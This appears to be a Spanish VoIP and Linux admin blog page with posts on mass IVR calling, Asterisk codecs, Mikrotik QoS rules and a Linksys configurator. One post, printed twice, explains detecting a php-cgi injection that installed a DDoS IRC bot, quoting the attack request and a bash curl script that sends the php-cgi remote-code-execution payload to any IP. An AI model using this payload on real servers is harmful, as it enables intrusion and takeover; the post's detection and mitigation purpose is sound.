Entrada destacada

Dial plan para EYEBEAM

Este articulo describe la forma de configurar el dialplan para un softphone eyebeam en un central PBX. Es valido para Perú, pero se puede aj...

jueves, 17 de agosto de 2017

IVR Masivos

Enviar miles de mensajes de voz en pocos minutos, ahorrando tiempo y dinero, es fácil con un sistema de IVR Masivos. Imagínate llamar a mas de 2500 números telefónicos en menos de 50 minutos!

IVR Masvos


La Creación de campaña es simple: 

1. Creamos una cuenta en Gamanet
2. Grabamos el audio que deseamos enviar en formato WAV o MP3 y lo subimos al sistema.
3. Subimos nuestra la lista de contactos de teléfonos fijos o celulares..
4. Creamos la campaña programada para una fecha y una hora, seleccionando el audio y los contactos; si deseamos configuramos la cantidad de reintentos.
5. Nos vamos a por un café.

Funcionamiento:

El sistema se encargara de entregar el audio a todos los contactos sean celulares o números fijos. Si programamos los reintentos, el sistema volverá a marcar a números que no contestaron.

Reportes:

El sistema IVR Masivo, nos genera un reporte detallado de la campaña. Realizara un informe de la fecha y hora de los números contestados y no contestados, el tiempo de duración de la llamada y el costo de la campaña.



Menú de Respuesta Interactiva por Voz:

Si es una campaña de telemarketing o encuesta, podemos configurar la difusión con respuesta donde el usuario podrá marcar 1 , 2 o cualquier dígito  para saber si esta interesado en el producto y de esta forma sabremos la cantidad de clientes que mostraron interés en el producto o servicio.

Ventajas:


  • Flexibilidad, puede usarse la imaginación para crear mensajes de voz interactivos con text to speech.
  • Resultados en tiempo real, en el momento se puede saber si el teléfono receptor está ocupado, no contestó o si recibió el llamado, esto es importantísimo en algunas estrategias de contactación y permite ajustar parámetros de las campañas en el momento.
  • Costo, los llamados telefónicos por lo general son más baratos que un SMS.
  • Efectividad del mensaje, se puede conocer si los destinatarios escucharon la totalidad o parte del mensaje calculando los segundos que duró el llamado.


Si deseas saber mas de este sistema puedes visitar la pagina sobre sistema IVR Masivos



viernes, 17 de febrero de 2017

Como saber los dispositivos de red en ubuntu server

Bueno no estoy hablando del archi conocido ifconfig. Estoy asumiendo que sabes configurar la red en el archivo de interfaces pero no sabes si el sistema la detecta o como se llama el dispositivo . osea eth0 , eth1 o cosas mas nuevas como enp2s0. etc

Bueno al grano el comando es:

# ip link.

Saludos.

martes, 14 de febrero de 2017

Codecs para versiones de asterisk 1.2 1.4 1.6

Si tienes asterisk de versiones antiguas  asterisk 1.2 , asterisk 1.4, asterisk 1.6 y requieres los codecs  g729 y g723 pues esta pagina te puede ayudar a obtenerlos.

ftp://avtolan.org/asterisk-g72x/index.html

Saludos.

miércoles, 1 de febrero de 2017

TOS Asterisk - Mikrotik

 Asterisk:

Valores para asterisk 1.8 protocolo SIP  tos_sip y protocolo RTP  tos_audio

Archivo sip.conf

tos_sip=cs3
tos_audio=ef
tos_video=af41


Equivalencias:

ef = dscp 46 = 101110 = tos 0xb8 (184) = ip prec 5
af31 = dscp 26 = 011010 | tos 0x68 (104) = ip prec 3
af32 = dscp 28 = 011100 = tos 0x70 (112) = ip prec 3
cs3 = dscp 24 = 011000 = tos 0x60 (96) = ip prec 3


Mikrotik:

/ip firewall mangle

add action=mark-packet chain=prerouting comment=VOIP new-packet-mark=voip-mark passthrough=no protocol=udp src-address=10.0.0.2
add action=mark-packet chain=prerouting comment=VOIP dst-address=10.0.0.2 new-packet-mark=voip-mark  protocol=udp
add action=mark-packet chain=prerouting comment=VOIP dscp=46 new-packet-mark=voip-mark

add action=mark-packet chain=prerouting comment=VOIP new-packet-mark=bulk packet-mark=!voip-mark passthrough=no


/queue tree
add name=Cola_Principal parent=PPOE_CASA priority=1
add limit-at=1M max-limit=2M name=Trafico_VOIP packet-mark=voip-mark parent=Cola_Principal priority=1 queue=ethernet-default
add limit-at=8M max-limit=10M name=Trafico_Bulk packet-mark=bulk parent=Cola_Principal queue=ethernet-default

lunes, 21 de noviembre de 2016

Como detectar si mi servidor es victima de inyección de código malicioso

La inyección de código malicioso se produjo porque tenia una versión vieja de php. Hay un bug en ciertas versiones antiguas de PHP en donde el ataque hace uso del php-cgi.

El ataque inicia modificando ciertos parámetros de configuración del servidor, para luego descargar un IRCBOT al que se conectan para usar nuestro servidor como atacante DDOS.

Pasos para detectar y mitigar el ataque:

1  Ejecutar ps ax para buscar proceso extraños.
2. Ejecutar  netstat -putona para ver los procesos y las direcciones ip a las que se conectan.
3. Agregar con iptables un bloqueo a la ip externa que se conecta el proceso extraño.
4. Matar el proceso con kill -9 pid
5. Ver en /tmp/ si hay carpetas ocultas extrañas también chequear en /var/tmp
6. Parar el servicio apache y comentar en el archivo de configuración todo lo que se refiere a cgi-bin y su directorio.
7. Actualizar la version de PHP.

Mirando los logs de apache podemos ver como inicia la inyección de código malicioso:

"POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1"

Mediante el método POST envían este cadena codificada con los parámetros que modifican el comportamiento de PHP en nuestro servidor.

Lo curioso es que se encontró en el archivo tmp un imagen llamada flbotbsd.jpg que es un directorio comprimido con herramientas de instalación del ircBot.

Lo siguiente es un script que detecta si el servidor es vulnerable a este ataque:

#!/bin/bash
#
# interactive shell over php-cgi POST requests.
#
#
if [ -z "$1" ] ;
    then
    echo "USAGE: $0 [ip] [command]"
    exit
fi

curl -i -s -k  -X 'POST' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' \
  --data-binary "" \
  "http://$1/cgi-bin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2dd+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"



Saludos.

Como detectar si mi servidor es victima de inyección de código malicioso

La inyección de código malicioso se produjo porque tenia una versión vieja de php. Hay un bug en ciertas versiones antiguas de PHP en donde el ataque hace uso del php-cgi.

El ataque inicia modificando ciertos parámetros de configuración del servidor, para luego descargar un IRCBOT al que se conectan para usar nuestro servidor como atacante DDOS.

Pasos para detectar y mitigar el ataque:

1  Ejecutar ps ax para buscar proceso extraños.
2. Ejecutar  netstat -putona para ver los procesos y las direcciones ip a las que se conectan.
3. Agregar con iptables un bloqueo a la ip externa que se conecta el proceso extraño.
4. Matar el proceso con kill -9 pid
5. Ver en /tmp/ si hay carpetas ocultas extrañas también chequear en /var/tmp
6. Parar el servicio apache y comentar en el archivo de configuración todo lo que se refiere a cgi-bin y su directorio.
7. Actualizar la version de PHP.

Mirando los logs de apache podemos ver como inicia la inyección de código malicioso:

"POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1"

Mediante el método POST envían este cadena codificada con los parámetros que modifican el comportamiento de PHP en nuestro servidor.

Lo curioso es que se encontró en el archivo tmp un imagen llamada flbotbsd.jpg que es un directorio comprimido con herramientas de instalación del ircBot.

Lo siguiente es un script que detecta si el servidor es vulnerable a este ataque:

#!/bin/bash
#
# interactive shell over php-cgi POST requests.
#
#
if [ -z "$1" ] ;
    then
    echo "USAGE: $0 [ip] [command]"
    exit
fi

curl -i -s -k  -X 'POST' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' \
  --data-binary "" \
  "http://$1/cgi-bin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2dd+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"



Saludos.

domingo, 2 de octubre de 2016

Configurador automatico de linksys pap2t

Muchos que trabajamos en este mundillo del VoIP, hemos configurado cientos e incluso miles de equipos VoIP de todas las marcas y modelos. Pero el equipo que mas hemos configurado, seguro es el Linksys pap2t.

Si queremos que el equipo Linksys pap2t trabaja bien, hay muchos parámetros que configurar, como el nombre del equipo, los tonos de marcado, los tonos de timbrado, el volumen del audio salida, el tiempo entre dígitos marcados, el nivel de jitter necesario, los codes g729, g723, etc.

Son muchos los parámetros a configurar, es por eso que en soporte voip creamos hace muchos años el configurador automático. Este sistema configura de forma automática los parámetros óptimos para que el equipo VoIP PAP2T trabaje al máximo de eficacia.

Otro problema que resuelve el configurador automático VoIP, es que el cliente nunca tiene que saber los passwords de la cuenta sip permitiendo tener una seguridad mejorada. Esto ayuda mucho para los acceso remotos con programas como el teamviewer, la configuracion del equipo sera segura  y demorara solo segundos.

Y que pasa en aquellas situaciones en la que es imposible acceder remotamente a la computadora del cliente para configurar el equipo Linksys. pues el configurador automático nos ayudara a configurar el equipo remoto de manera muy fácil.

El código que genera este sistema nos permite decir al cliente que visite la pagina web del configurador, ingrese el código y la ip del equipo linksys. El configurador automático configurara por nosotros el equipo linksys.

Este sistema también configura automáticamente equipos cisco SPA 112.

En resumen una maravilla que nos ayudara en muchas situaciones.